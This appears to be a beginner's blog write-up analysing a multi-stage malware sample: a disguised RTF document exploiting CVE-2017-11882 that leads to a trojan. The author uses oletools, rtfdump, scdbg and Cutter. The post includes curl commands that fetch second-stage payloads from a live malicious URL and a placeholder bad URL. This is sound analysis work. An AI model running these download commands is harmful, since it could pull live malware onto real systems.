Analysing a malware sample
After learning the basics of malware analysis, I decided to challenge myself by analyzing a real-world sample. I picked a recent upload from Malware Bazaar, which had no tags at the time. My objective was to identify what type of malware it was and understand its behavior.
This is the sample:
https://bazaar.abuse.ch/sample/613b4de5c0a4a0efc484e93eff8281250787bbe45e0652754eee9cbf1186cebb/
Remember to perform malware analysis in a safe environment.
Initial Inspection
The file under analysis had a .doc extension, suggesting it was a Microsoft Word document. To extract metadata, I ran: olemeta sample.doc. However, this threw an exception: not an OLE2 structured storage file, meaning it wasn't a Word document.
Using Detect It Easy (DIE), I found that the file was actually an archive. After extracting its contents, I discovered it was an RTF (Rich Text Format) file, which I could also inspect in VS Code.

Next, I used oleid to check for embedded objects: oleid sample.doc. The results revealed an external relationship within the document. oleobj returned an object name and an external link, likely leading to a second-stage payload.

I attempted to retrieve the linked payload using curl. This request curl --output file_2.rtf https://agr.my/X7TO8b resulted in a redirect, so I followed it to get the actual file: curl --output file_2.rtf <redirected_url>.
Then, I uploaded the document to Hybrid Analysis, which identified CVE-2017-11882 as the exploit used.
https://www.hybrid-analysis.com/sample/5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da/67ead51d92d9e3292808211esha256: 5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da
CVE-2017-11882 is a vulnerability in Microsoft Equation Editor that allows attackers to execute arbitrary code when a malicious document is opened.

Extracting the Payload from RTF
Since the second-stage file contained executable code, I needed to extract it. While doing some search, I found an article describing a similar case.
Following its guidance, I extracted the payload using:
rtfdump.py -F -s 1 -d ./example/file_2.rtf | oledump.py -s 1 -d > out.txt

Analyzing the Third-Stage Payload
The extracted payload was an obfuscated file. To analyze it, I used scdbg, a shellcode emulator that allows executing and analyzing shellcode in a controlled environment. I ran:
-r: report mode to log execution behavior,-findsc: findsc mode to locate embedded shellcode.

curl --output malicious.vbe badurl/vbe
I also used Cutter, an open-source reverse engineering platform, to analyze the shellcode. It appears to manipulate the byte order or reverse the string to decode data and load .NET assembly bytecode directly into memory.
From here the analysis becomes more complex as the payload needs to be deobfuscated.
I uploaded file malicious.vbe to Hybrid Analysis, which classified it as a Trojan: https://www.hybrid-analysis.com/sample/42e843cba5acfcc113932267d0bf11fbf973a474f40ae473d32a49243e7fc93d
Conclusion
This was my first hands-on malware analysis experience, and it helped me understand:
- How malicious documents use external relationships to fetch additional payloads,
- The exploitation of CVE-2017-11882 in RTF-based attacks,
- Techniques for extracting embedded payloads from document files,
- How multi-stage malware works, leading to Trojan infections.
Resources
- How to Analyze Malicious Microsoft Office Files,
- How RTF malware evades static signature-based detection.
- https://github.com/romeomallavo/Malware-Analysis-RTF-Document-Lab
- https://bufferzonesecurity.com/the-beginners-guide-to-rtf-malware-reverse-engineering-part-1/
- https://foxptr.medium.com/analyzing-rtf-documents-5bb45071adfd
